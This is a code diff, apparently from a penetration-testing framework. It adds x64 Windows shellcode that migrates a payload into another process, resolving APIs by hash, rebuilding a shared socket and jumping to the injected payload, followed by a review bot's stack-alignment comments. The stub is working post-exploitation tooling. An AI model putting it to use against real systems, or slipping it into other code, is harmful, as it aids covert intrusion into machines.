diff --git a/external/source/shellcode/windows/x64/src/single/migrate.asm b/external/source/shellcode/windows/x64/src/single/migrate.asm
new file mode 100644
index 0000000000..0acd0eb406
--- /dev/null
+++ b/external/source/shellcode/windows/x64/src/single/migrate.asm
@@ -0,0 +1,71 @@
+;-----------------------------------------------------------------------------;
+; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
+; Compatible: Windows 7, 2008, 2003, XP
+; Architecture: x64
+; Version: 1.0 (Jan 2010)
+; Size: 306 bytes
+; Build: >build.py migrate
+;-----------------------------------------------------------------------------;
+
+; typedef struct MigrateContext
+; {
+; union
+; {
+; HANDLE hEvent;
+; BYTE bPadding1[8];
+; } e;
+; union
+; {
+; LPVOID lpPayload;
+; BYTE bPadding2[8];
+; } p;
+; WSAPROTOCOL_INFO info;
+; } MIGRATECONTEXT, * LPMIGRATECONTEXT;
+
+[BITS 64]
+[ORG 0]
+
+ cld ; Clear the direction flag.
+ mov rsi, rcx ; RCX is a pointer to our migration stub context
+ sub rsp, 0x2000 ; Alloc some space on stack
+ and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned
+ call start ; Call start, this pushes the address of 'api_call' onto the stack.
+delta: ;
+%include "./src/block/block_api.asm"
+start: ;
+ pop rbp ; Pop off the address of 'api_call' for calling later.
+ ; setup the structures we need on the stack...
+ mov r14, 'ws2_32' ;
+ push r14 ; Push the bytes 'ws2_32',0,0 onto the stack.
+ mov rcx, rsp ; save pointer to the "ws2_32" string for LoadLibraryA call.
+ sub rsp, 408+8 ; alloc sizeof( struct WSAData ) bytes for the WSAData structure (+8 for alignment)
+ mov r13, rsp ; save pointer to the WSAData structure for WSAStartup call.
+ sub rsp, 0x28 ; alloc space for function calls
+ ; perform the call to LoadLibraryA...
+ mov r10d, 0x0726774C ; hash( "kernel32.dll", "LoadLibraryA" )
+ call rbp ; LoadLibraryA( "ws2_32" )
+ ; perform the call to WSAStartup...
+ mov rdx, r13 ; second param is a pointer to this stuct
+ push byte 2 ;
+ pop rcx ; set the param for the version requested
+ mov r10d, 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" )
+ call rbp ; WSAStartup( 2, &WSAData );
+ ; perform the call to WSASocketA...
+ xor r8, r8 ; we do not specify a protocol
+ push r8 ; push zero for the flags param.
+ push r8 ; push null for reserved parameter
+ lea r9, [rsi+16] ; We specify the WSAPROTOCOL_INFO structure from the MigrateContext
+ push byte 1 ;
+ pop rdx ; SOCK_STREAM == 1
+ push byte 2 ;
+ pop rcx ; AF_INET == 2
+ mov r10d, 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
+ call rbp ; WSASocketA( AF_INET, SOCK_STREAM, 0, &info, 0, 0 );
+ mov rdi, rax ; save the socket for later
+ ; perform the call to SetEvent...
+ mov rcx, qword [rsi] ; Set the first parameter to the migrate event
+ mov r10d, 0x35269F1D ; hash( "kernel32.dll", "SetEvent" )
+ call rbp ; SetEvent( hEvent );
+ ; perform the call to the payload...
+ call qword [rsi+8] ; Call the payload...
+
\ No newline at end of file
diff --git a/external/source/shellcode/windows/x86/src/single/migrate.asm b/external/source/shellcode/windows/x86/src/single/migrate.asm
index b3acad7220..7108031e5b 100644
--- a/external/source/shellcode/windows/x86/src/single/migrate.asm
+++ b/external/source/shellcode/windows/x86/src/single/migrate.asm
@@ -1,6 +1,7 @@
 ;-----------------------------------------------------------------------------;
 ; Author: Stephen Fewer (stephen_fewer[at]harmonysecurity[dot]com)
 ; Compatible: Windows 7, 2008, Vista, 2003, XP, 2000, NT4
+; Architecture: x86
 ; Version: 1.0 (Jan 2010)
 ; Size: 219 bytes
 ; Build: >build.py migrate
@@ -56,7 +57,7 @@ start: ;
 inc eax ;
 push eax ; Push AF_INET
 push 0xE0DF0FEA ; hash( "ws2_32.dll", "WSASocketA" )
- call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, 0, 0, 0 );
+ call ebp ; WSASocketA( AF_INET, SOCK_STREAM, 0, &info, 0, 0 );
 xchg edi, eax ; Save the socket for later, we don't care about the value of eax after this
 push dword [esi] ; Push the event
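Review bot: The comment on `sub rsp, 0x28 ; alloc space for function calls` understates what the stack discipline in this file depends on: if api_call in the included block_api.asm reserves the 0x20 home space itself and leaves it allocated when the API returns (as the x64 variant in this tree appears to, to be confirmed against that file), RSP sinks by 0x20 on every `call rbp`, so the 0x28 here is what keeps RSP 16-byte aligned at each call rather than the callee's shadow space, and the `sub rsp, 0x2000` near the top is the budget that absorbs the drift. I would replace the comment with `sub rsp, 0x28 ; keep RSP 16-byte aligned at each 'call rbp'; api_call reserves its own 0x20 home space and does not restore it, so RSP drops 0x20 per call (covered by the 0x2000 reserved above)`. The two `push r8` lines supplying WSASocketA's fifth and sixth arguments rely on the same contract, since the Win64 ABI places stack arguments directly above the home space that api_call inserts, and that is worth a one-line comment at the first push. As a point of style, `[rsi]`, `[rsi+8]` and `[rsi+16]` could be named through a `struc` mirroring the MIGRATECONTEXT typedef in the header so the offsets cannot drift from it, and `stuct` in the WSAStartup comment is a typo for `struct`.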